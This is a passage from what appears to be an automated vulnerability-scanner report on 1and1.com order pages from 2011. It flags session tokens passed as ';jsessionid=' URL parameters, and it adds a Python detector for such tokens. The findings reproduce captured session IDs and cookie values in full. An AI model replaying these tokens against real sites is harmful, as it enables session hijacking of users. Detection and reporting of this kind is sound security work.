<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureSite-buildingCnba&amp;page=switch&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
</div><a rel="blank" class="target" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">To 1&amp;1 Linux Web Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureSite-buildingCnba&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureSite-buildingCnba&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...
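The two checks behind findings 3.51 and 3.52 above (a jsessionid path parameter in the request URL, and response links that carry that token), as an added example in Python; this is not the report's or the scanner's own code. The sample request line, Location header and anchor tags are taken from the excerpts above, with one token-free link constructed for contrast. The set of query-parameter names treated as session tokens is an assumption, as is the reading of the suffix after the dot (TCpfix140a, TCpfix141a) as a routing hint in the style of a Tomcat jvmRoute.

```python
"""Session-token-in-URL checks modelled on findings 3.51 and 3.52 (added example)."""
import re
from html import unescape
from urllib.parse import parse_qs, urlsplit

# Servlet-style URL rewriting: ";jsessionid=<hex>[.<route>]" as a path parameter.
# The ".<route>" suffix is captured separately; treating it as a jvmRoute-style
# routing hint is an assumption about this deployment.
_PATH_TOKEN = re.compile(r";jsessionid=([0-9a-f]+)(?:\.([a-z0-9_-]+))?", re.IGNORECASE)

# Query-parameter names also treated as session tokens (assumption: common names).
_QUERY_TOKEN_NAMES = {"jsessionid", "phpsessid", "sessionid", "sid"}

_HREF = re.compile(r"""href\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def session_token_in_url(url):
    """Return (token, route_suffix, where) if `url` carries a session token, else None.

    `where` is "path" for a ;jsessionid= path parameter, "query" for ?jsessionid=.
    """
    m = _PATH_TOKEN.search(url)
    if m:
        return m.group(1), m.group(2), "path"
    for name, values in parse_qs(urlsplit(url).query).items():
        if name.lower() in _QUERY_TOKEN_NAMES and values:
            return values[0], None, "query"
    return None


def request_target(request_line):
    """Extract the request-target from 'GET /a;jsessionid=x?y=z HTTP/1.1'."""
    parts = request_line.split()
    return parts[1] if len(parts) >= 2 else ""


def links_with_session_tokens(html):
    """Return [(href, token), ...] for every href in `html` that embeds a session token."""
    hits = []
    for raw in _HREF.findall(html):
        href = unescape(raw)  # &amp; -> & before the query string is parsed
        found = session_token_in_url(href)
        if found:
            hits.append((href, found[0]))
    return hits


def redirect_drops_token(response_headers, token):
    """True if a Location header is present and no longer contains `token`."""
    for line in response_headers.splitlines():
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            return token not in value
    return False


# Samples: request line and 301 headers from finding 3.51, two anchors from the
# 3.52 response body, plus one constructed token-free link for contrast.
REQUEST_3_51 = ("GET /xml/order/FeatureSite-buildingCgi;jsessionid="
                "A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1")
RESPONSE_3_51_HEADERS = """HTTP/1.1 301 Moved Permanently
Location: http://order.1and1.com/xml/order/FeatureSite-buildingCgi?__frame=_top&__lf=Static
Content-Length: 0"""
RESPONSE_3_52_BODY = """<a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.nav.home">Home</a>
<a href="/xml/order/Home?__frame=_top&amp;__lf=Static">Home (constructed, no token)</a>
<a rel="blank" class="target" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">To 1&amp;1 Linux Web Hosting</a>"""


def analyse():
    """Apply both checks to the samples and summarise what each one finds."""
    token, route, where = session_token_in_url(request_target(REQUEST_3_51))
    leaking = links_with_session_tokens(RESPONSE_3_52_BODY)
    return {
        "request_token": token,
        "route_suffix": route,
        "where": where,
        "redirect_dropped_token": redirect_drops_token(RESPONSE_3_51_HEADERS, token),
        "leaking_links": len(leaking),
    }


if __name__ == "__main__":
    print(analyse())
```

Pointing these functions at a saved proxy log reproduces the report's classification: a request whose target matches the path pattern is a 3.51-style finding, a body with one or more leaking links is a 3.52-style finding. A 301 whose Location omits the token, as in 3.51, narrows the exposure but does not remove it, because the token was already sent and logged with the original request.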

3.53. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCnba

Issue detail

The URL in the request carries the session token as a ;jsessionid= path parameter rather than as a cookie:

Request

GET /xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:20 GMT; Path=/
ETag: 9de78ef384b1a75fd3107fb41be3e05d
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27882


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.54. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingContentmoduls

Issue detail

The URL in the request carries the session token as a ;jsessionid= path parameter rather than as a cookie:

Request

GET /xml/order/FeatureSite-buildingContentmoduls;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.55. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDriving

Issue detail

The URL in the request carries the session token as a ;jsessionid= path parameter rather than as a cookie:

Request

GET /xml/order/FeatureSite-buildingDriving;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingDriving?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.56. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The URL in the request carries the session token as a ;jsessionid= path parameter rather than as a cookie:

Request

GET /xml/order/FeatureSite-buildingDsc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:15 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingDsc?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.57. http://order.1and1.com/xml/order/FeatureSite-buildingElements

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The URL in the request carries the session token as a ;jsessionid= path parameter rather than as a cookie:

Request

GET /xml/order/FeatureSite-buildingElements;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingElements?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.58. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMailinglist

Issue detail

The URL in the request carries the session token as a ;jsessionid= path parameter rather than as a cookie:

Request

GET /xml/order/FeatureSite-buildingMailinglist;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:45:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.59. http://order.1and1.com/xml/order/FeatureSite-buildingMap

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMap

Issue detail

The URL in the request carries the session token as a ;jsessionid= path parameter rather than as a cookie:

Request

GET /xml/order/FeatureSite-buildingMap;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:43:34 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingMap?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.60. http://order.1and1.com/xml/order/FeatureSite-buildingNet

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingNet

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingNet;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:06 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingNet?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.61. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:42:45 GMT
